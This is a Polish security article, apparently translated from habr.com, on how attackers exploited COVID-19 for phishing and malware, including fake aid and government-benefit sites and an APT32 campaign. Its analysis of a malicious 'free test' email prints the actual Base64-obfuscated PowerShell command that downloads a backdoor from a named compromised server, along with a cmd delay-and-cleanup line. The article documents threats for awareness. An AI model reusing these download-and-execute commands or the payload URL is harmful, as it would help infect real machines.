Atakujący w dalszym ciągu wykorzystują temat COVID-19, tworząc coraz więcej zagrożeń dla użytkowników żywo zainteresowanych wszystkim, co jest związane z epidemią. W Mówiliśmy już o tym, jakie rodzaje złośliwego oprogramowania pojawiły się w następstwie wirusa koronowego, a dzisiaj porozmawiamy o technikach socjotechniki, z którymi zetknęli się już użytkownicy w różnych krajach, w tym w Rosji. Ogólne trendy i przykłady są poniżej wycięcia.
Pamiętaj w Rozmawialiśmy o tym, że ludzie chętnie czytają nie tylko o koronawirusie i przebiegu epidemii, ale także o środkach wsparcia finansowego? Oto dobry przykład. Ciekawy atak phishingowy wykryto w niemieckim kraju związkowym Nadrenia Północna-Westfalia, czyli NRW. Napastnicy stworzyli kopie strony internetowej Ministerstwa Gospodarki (), gdzie każdy może ubiegać się o pomoc finansową. Taki program faktycznie istnieje i okazał się korzystny dla oszustów. Po otrzymaniu danych osobowych swoich ofiar złożyli wniosek na prawdziwej stronie ministerstwa, podając jednak inne dane bankowe. Według oficjalnych danych do czasu wykrycia oszustwa złożono 4 tys. takich fałszywych wniosków. W rezultacie w ręce oszustów wpadło 109 milionów dolarów przeznaczonych dla dotkniętych obywateli.
Chcesz bezpłatnie wykonać test na Covid-19?
Innym znaczącym przykładem phishingu związanego z koronawirusem był w e-mailach. Wiadomości przykuły uwagę użytkowników propozycją poddania się bezpłatnym testom na obecność wirusa. W załączniku te istniały przypadki Trickbota/Qakbota/Qbota. A kiedy osoby chcące sprawdzić swój stan zdrowia zaczęły „wypełniać załączony formularz”, na komputer pobierany był złośliwy skrypt. Aby uniknąć testowania w trybie sandbox, skrypt zaczął pobierać głównego wirusa dopiero po pewnym czasie, gdy systemy zabezpieczające były przekonane, że nie nastąpi żadna złośliwa aktywność.
Przekonanie większości użytkowników do włączenia makr również było łatwe. W tym celu zastosowano standardowy trik: aby wypełnić ankietę, należy najpierw włączyć makra, co oznacza konieczność uruchomienia skryptu VBA.
Jak widać, skrypt VBA jest specjalnie maskowany przed programami antywirusowymi.
System Windows posiada funkcję oczekiwania, dzięki której aplikacja czeka /T <sekund> przed przyjęciem domyślnej odpowiedzi „Tak”. W naszym przypadku skrypt czekał 65 sekund przed usunięciem plików tymczasowych:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Podczas oczekiwania pobrano złośliwe oprogramowanie. W tym celu został uruchomiony specjalny skrypt PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Po zdekodowaniu wartości Base64 skrypt PowerShell pobiera z Niemiec backdoora zlokalizowanego na wcześniej zhakowanym serwerze WWW:
http://automatischer-staubsauger.com/feature/777777.pngi zapisuje go pod nazwą:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’ jest usuwany po uruchomieniu pliku „tmps1.bat” zawierającego polecenie cmd /c mkdir ""C:UsersPublictmpdir"".
Ukierunkowany atak na agencje rządowe
Ponadto analitycy FireEye zgłosili niedawno ukierunkowany atak APT32 wymierzony w struktury rządowe w Wuhan, a także chińskie Ministerstwo Zarządzania Kryzysowego. Jeden z rozesłanych plików RTF zawierał link do artykułu w New York Times pt . Jednak po jego przeczytaniu pobrano złośliwe oprogramowanie (analitycy FireEye zidentyfikowali instancję jako METALJACK).
Co ciekawe, według Virustotal w momencie wykrycia żaden z programów antywirusowych nie wykrył tego przypadku.
Kiedy oficjalne strony internetowe nie działają
Najbardziej uderzający przykład ataku phishingowego miał miejsce niedawno w Rosji. Powodem tego było powołanie długo oczekiwanego świadczenia na dzieci w wieku od 3 do 16 lat. Kiedy 12 maja 2020 roku ogłoszono rozpoczęcie przyjmowania wniosków, miliony ludzi pobiegły na stronę Służb Państwowych po długo oczekiwaną pomoc i zniszczyły portal nie gorzej niż profesjonalny atak DDoS. Kiedy prezydent stwierdził, że „Służby rządowe nie radzą sobie z napływem wniosków”, w Internecie zaczęto mówić o uruchomieniu alternatywnej strony przyjmowania wniosków.
Problem w tym, że kilka stron zaczęło działać jednocześnie i o ile jedna, ta prawdziwa pod adresem posobie16.gosuslugi.ru, faktycznie przyjmuje zgłoszenia, o tyle więcej .
Współpracownicy z SearchInform odkryli około 30 nowych fałszywych domen w strefie .ru. Od początku kwietnia firmy Infosecurity i Softline wyśledziły ponad 70 podobnych fałszywych witryn usług rządowych. Ich twórcy manipulują znanymi symbolami, a także używają kombinacji słów gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie i tak dalej.
Hype i inżynieria społeczna
Wszystkie te przykłady tylko potwierdzają, że napastnicy skutecznie zarabiają na temacie koronaawirusa. A im większe napięcie społeczne i im bardziej niejasne kwestie, tym większe ryzyko, że oszuści ukradną ważne dane, zmuszą ludzi do samodzielnego oddania pieniędzy lub po prostu włamią się do większej liczby komputerów.
A biorąc pod uwagę, że pandemia zmusiła potencjalnie nieprzygotowanych ludzi do masowej pracy z domu, zagrożone są nie tylko dane osobiste, ale także firmowe. Na przykład niedawno użytkownicy Microsoft 365 (dawniej Office 365) również padli ofiarą ataku phishingowego. Ludzie otrzymywali masowe „nieodebrane” wiadomości głosowe jako załączniki do listów. Jednak w rzeczywistości pliki były stroną HTML, na którą odsyłane były ofiary ataku . W rezultacie utrata dostępu i naruszenie wszystkich danych z konta.
Źródło: www.habr.com